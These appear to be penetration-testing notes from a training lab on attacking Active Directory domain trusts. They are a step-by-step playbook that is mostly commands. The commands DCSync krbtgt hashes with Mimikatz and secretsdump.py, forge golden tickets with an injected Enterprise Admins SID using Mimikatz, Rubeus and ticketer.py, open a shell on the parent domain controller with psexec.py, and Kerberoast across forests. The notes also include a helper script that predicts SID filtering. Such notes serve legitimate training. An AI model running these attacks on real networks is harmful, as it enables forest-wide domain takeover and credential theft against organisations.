Domain Trust Enumeration

Enumerate Domain Trusts (PowerView)

Show Existing Trusts

# PowerView, run in the context of the current domain: lists each trust with its direction and attributes
Get-DomainTrust

Show Trust Mapping

Get-DomainTrustMapping

Show Users in the Child Domain

Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName

Attacking Domain Trusts - Child -> Parent (Windows)

To perform this attack after compromising a child domain, we need the following:

  1. The KRBTGT NT hash for the child domain

  2. The SID for the child domain

  3. The name of a target user in the child domain (does not need to exist!)

  4. The FQDN of the child domain

  5. The SID of the Enterprise Admins group of the root domain

With this data collected, the attack can be performed with Mimikatz (or Rubeus): a golden ticket for the child domain is forged with the Enterprise Admins SID injected as an extra SID (SID history). The parent DC honours that SID because SID filtering is not applied to trusts inside a forest, so the ticket carries Enterprise Admin rights across the whole forest.

1 Obtaining KRBTGT NT Hash

# Mimikatz, as a Domain Admin of the child: DCSync only the child's krbtgt account
lsadump::dcsync /user:LOGISTICS\krbtgt

2 Obtaining SID Child Domain

# PowerView, run in the child domain context: returns the child domain SID (S-1-5-21-...)
Get-DomainSID

3 Name Target User

# Can be a fake username: the TGT is forged, so the account does not need to exist

4 FQDN Child Domain

# The SourceName column of the trust listing gives the child domain FQDN
Get-DomainTrust

5 SID Enterprise Admins Group

Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

6 Putting It All Together

# Mimikatz Way: /sid is the child domain SID, /krbtgt the NT hash from step 1, /sids the Enterprise Admins SID injected as SID history, /ptt loads the ticket into the current session
kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt

# Rubeus Way: same values; /rc4 takes the krbtgt NT hash
.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt

7 Confirm Ticket

# List cached Kerberos tickets; the forged TGT for LOGISTICS\hacker should be present
klist

8 DCsync

# Mimikatz: with the forged ticket in memory, DCSync the parent domain (here its krbtgt account)
lsadump::dcsync /user:INLANEFREIGHT\krbtgt /domain:INLANEFREIGHT.LOCAL

Attacking Domain Trusts - Child -> Parent (Linux)

We can also perform the attack shown in the previous section from a Linux attack host. To do so, we'll still need to gather the same bits of information:

  1. The KRBTGT hash for the child domain

  2. The SID for the child domain

  3. The name of a target user in the child domain (does not need to exist!)

  4. The FQDN of the child domain

  5. The SID of the Enterprise Admins group of the root domain

1 Get KRBTGT NT Hash

# DCSync only the child's krbtgt from the child DC (172.16.5.240); needs child Domain Admin credentials
secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt

2 Get SID Child Domain

# The child domain SID is printed in the header of the lookupsid.py output
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID"

3 Name Target User

Can be any name; the account does not need to exist in the child domain.

4 Get SID Enterprise Admins

# Query the root DC (172.16.5.5): the -B12 context shows the root domain SID above the RID 519 entry, and the Enterprise Admins SID is that root SID with -519 appended
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"

5 Putting it all Together

# -extra-sid injects the Enterprise Admins SID into the ticket's SID history; the TGT is written to hacker.ccache
ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker

6 Export ccache

# Point the Impacket tools at the forged ticket
export KRB5CCNAME=hacker.ccache

7 Get Shell

# -k -no-pass uses the ccache; the target must be given by hostname because Kerberos tickets are bound to service names, -target-ip supplies the address
psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5

Automatic Way

# Impacket's raiseChild.py runs steps 1-7 for you from child Domain Admin credentials; -target-exec launches psexec on the parent DC with the forged ticket
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm

Attacking Domain Trust - Cross-Forest (Windows)

Cross-Forest Kerberoasting

# Enumerate Cross Forest Users with SPN
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName

# Rubeus /Domain flag
.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap

Admin Password Reuse & Group Membership

# Check Foreign Groups
Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL

# Convert SID
Convert-SidToName <SID>

# If the foreign member resolves to an INLANEFREIGHT admin and the password is reused, log in to the foreign DC directly
Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator

SID History Abuse

[Image: Pasted image 20230428181936.png (not rendered on this page)]
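Whether a forged SID history survives a trust depends on the trust's SID filtering settings, which is the difference between the child-to-parent case above (always honoured inside a forest) and the cross-forest case here. As an added example (not part of the original notes or of PowerView), the Python below decodes the trustAttributes bit flags that Get-DomainTrust reports for a trust and applies the default SID-filtering rules to a candidate extra SID: intra-forest trusts pass it, forest trusts filter it unless SID history was enabled on the trust (TREAT_AS_EXTERNAL), in which case only SIDs with RID 1000 or higher pass, and external trusts filter it only when SID filter quarantining (FILTER_SIDS) is set. The sample trusts are constructed; the function names are this example's own, and the rules model documented default behaviour, so confirm them against the real trust before relying on them.

```python
"""Predict whether an injected extra SID will be filtered by a given trust.

Added example, not part of the original notes. Decodes the trustAttributes
flags (MS-ADTS values; PowerView prints the same names) and applies the
default SID-filtering rules. Sample trusts below are constructed.
"""
TRUST_ATTRIBUTE_FLAGS = {
    0x01: "NON_TRANSITIVE",
    0x02: "UPLEVEL_ONLY",
    0x04: "FILTER_SIDS",          # SID filter quarantining (netdom /quarantine:yes)
    0x08: "FOREST_TRANSITIVE",    # forest trust
    0x10: "CROSS_ORGANIZATION",
    0x20: "WITHIN_FOREST",        # parent-child or tree-root trust
    0x40: "TREAT_AS_EXTERNAL",    # forest trust with SID history enabled
    0x80: "USES_RC4_ENCRYPTION",
}
FILTER_SIDS, FOREST_TRANSITIVE, WITHIN_FOREST, TREAT_AS_EXTERNAL = 0x04, 0x08, 0x20, 0x40

# Constructed examples of what Get-DomainTrust might show; not real environments.
SAMPLE_TRUSTS = [
    {"SourceName": "LOGISTICS.INLANEFREIGHT.LOCAL", "TargetName": "INLANEFREIGHT.LOCAL", "TrustAttributes": 0x20},
    {"SourceName": "INLANEFREIGHT.LOCAL", "TargetName": "FREIGHTLOGISTICS.LOCAL", "TrustAttributes": 0x08},
    {"SourceName": "INLANEFREIGHT.LOCAL", "TargetName": "EXAMPLE-FOREST.LOCAL", "TrustAttributes": 0x48},
]


def decode_trust_attributes(value):
    """Return the flag names set in a trustAttributes integer, lowest bit first."""
    return [name for bit, name in TRUST_ATTRIBUTE_FLAGS.items() if value & bit]


def sid_rid(sid):
    """Relative identifier: the last component of an S-1-5-21-... SID."""
    return int(sid.rsplit("-", 1)[1])


def extra_sid_passes(trust_attributes, extra_sid):
    """Return (passes, reason) for an extra SID crossing this trust."""
    rid = sid_rid(extra_sid)
    if trust_attributes & FILTER_SIDS:
        return False, "SID filter quarantining set: SIDs outside the trusted domain are dropped"
    if trust_attributes & WITHIN_FOREST:
        return True, "intra-forest trust: SID history is not filtered"
    if trust_attributes & FOREST_TRANSITIVE:
        if not trust_attributes & TREAT_AS_EXTERNAL:
            return False, "forest trust: SID filtering is on by default"
        if rid >= 1000:
            return True, "forest trust with SID history enabled: RID >= 1000 passes"
        return False, "forest trust with SID history enabled still filters RIDs below 1000"
    return True, "external trust without quarantining: SID history is honoured"


def assess_trusts(trusts, extra_sid):
    """Run extra_sid_passes over a list of trust dicts and return a summary per trust."""
    results = []
    for trust in trusts:
        passes, reason = extra_sid_passes(trust["TrustAttributes"], extra_sid)
        results.append({
            "trust": f'{trust["SourceName"]} -> {trust["TargetName"]}',
            "flags": decode_trust_attributes(trust["TrustAttributes"]),
            "passes": passes,
            "reason": reason,
        })
    return results


if __name__ == "__main__":
    ea_sid = "S-1-5-21-3842939050-3880317879-2865463114-519"
    for row in assess_trusts(SAMPLE_TRUSTS, ea_sid):
        print(f'{row["trust"]:55} {row["flags"]!s:40} {"PASS" if row["passes"] else "FILTERED"}  {row["reason"]}')
```

The practical consequence for the cross-forest case: an Enterprise Admins SID (RID 519) is filtered on every forest trust, even one with SID history enabled, so SID History abuse across forests targets a group in the other forest whose RID is 1000 or higher.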

Attacking Domain Trusts - Cross-Forest Trust Abuse (Linux)

Cross-Forest Kerberoasting

# Using -target-domain
GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley

Last updated 5 months ago